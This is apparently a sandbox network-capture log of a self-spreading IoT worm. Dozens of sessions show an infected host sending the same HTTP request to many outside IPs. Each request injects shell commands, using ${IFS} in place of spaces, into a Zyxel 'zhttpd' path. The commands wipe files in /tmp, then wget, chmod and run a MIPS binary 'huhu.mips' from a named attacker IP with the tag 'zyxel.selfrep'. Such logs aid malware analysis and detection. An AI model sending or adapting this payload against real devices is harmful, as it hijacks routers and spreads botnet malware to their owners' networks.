                                                      Feb 2, 2024 06:35:23.230403900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      577192.168.2.144433498.10.69.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:23.230449915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      578192.168.2.1435920136.154.6.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:23.230479002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      579192.168.2.1440550164.168.36.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:23.230501890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      580192.168.2.1454966218.151.153.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:23.230560064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      581192.168.2.143920286.96.13.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:23.230686903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      582192.168.2.1447392146.244.150.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:23.230709076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      583192.168.2.1440518133.63.216.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:23.230823040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      584192.168.2.1433778130.97.246.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:24.238317966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      585192.168.2.1456690161.222.93.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:24.238373995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      586192.168.2.1447450130.15.143.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:24.238429070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      587192.168.2.1449464179.228.233.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:24.238459110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      588192.168.2.1444136195.216.54.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:24.238500118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      589192.168.2.1459610125.220.46.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:24.238605976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      590192.168.2.1446534184.26.178.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.241760969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      591192.168.2.144120091.218.209.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.241813898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      592192.168.2.1433096134.35.241.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.241835117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      593192.168.2.1445848220.232.80.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.241858006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      594192.168.2.145414086.227.105.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.241916895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      595192.168.2.143679263.98.153.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.241925955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      596192.168.2.145618063.6.213.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.241978884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      597192.168.2.1455966164.123.48.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.242326975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      598192.168.2.143535290.229.43.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.242383957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      599192.168.2.145502675.116.79.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.242397070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      600192.168.2.1441806194.189.244.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.242465019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      601192.168.2.1446808139.75.230.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.242517948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      602192.168.2.144694877.1.232.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.242677927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      603192.168.2.143434269.217.165.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.242705107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      604192.168.2.1451104210.76.123.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.242780924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      605192.168.2.1446788140.43.181.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.242907047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      606192.168.2.1435062118.104.85.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.242933035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      607192.168.2.1434136151.150.183.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.243184090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      608192.168.2.1449138154.220.116.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.243561983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      609192.168.2.1450358159.64.87.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.243742943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      610192.168.2.146032250.26.19.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.243743896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      611192.168.2.143629436.239.149.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.243936062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      612192.168.2.1447904143.126.255.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.243937016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      613192.168.2.1443060104.122.155.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.244122982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      614192.168.2.145545491.241.155.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.244122982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      615192.168.2.145161881.250.106.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.244122982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      616192.168.2.1459532223.240.159.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:25.244122982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      617192.168.2.1460130185.173.191.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:26.248137951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      618192.168.2.1458630178.187.120.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:26.248192072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      619192.168.2.14456629.187.26.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:27.252414942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      620192.168.2.1434784102.168.168.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:28.256548882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      621192.168.2.1449072222.15.112.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:28.256589890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      622192.168.2.143350032.167.244.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:28.256617069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      623192.168.2.145395848.53.161.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:28.256669044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      624192.168.2.1436304141.78.198.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:28.256794930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      625192.168.2.1457168198.3.122.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:29.261295080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      626192.168.2.1435506221.65.187.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:29.261346102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      627192.168.2.1456588148.65.38.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:29.261384010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      628192.168.2.1455166147.113.88.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:29.261404991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      629192.168.2.145968064.183.184.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:29.261415005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      630192.168.2.1440250204.130.216.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:29.261523962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      631192.168.2.1456316108.124.135.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:30.265078068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      632192.168.2.144914041.226.222.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:30.265125036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      633192.168.2.144040273.60.8.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:30.265172005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      634192.168.2.145239839.166.170.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:30.265208006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      635192.168.2.144391848.13.7.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:30.265229940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      636192.168.2.1460350101.132.221.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:30.265265942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      637192.168.2.1458306168.190.69.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:30.265296936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      638192.168.2.145638091.118.137.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:30.265419960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      639192.168.2.14388305.24.89.74443
                                                      TimestampBytes transferredDirectionData
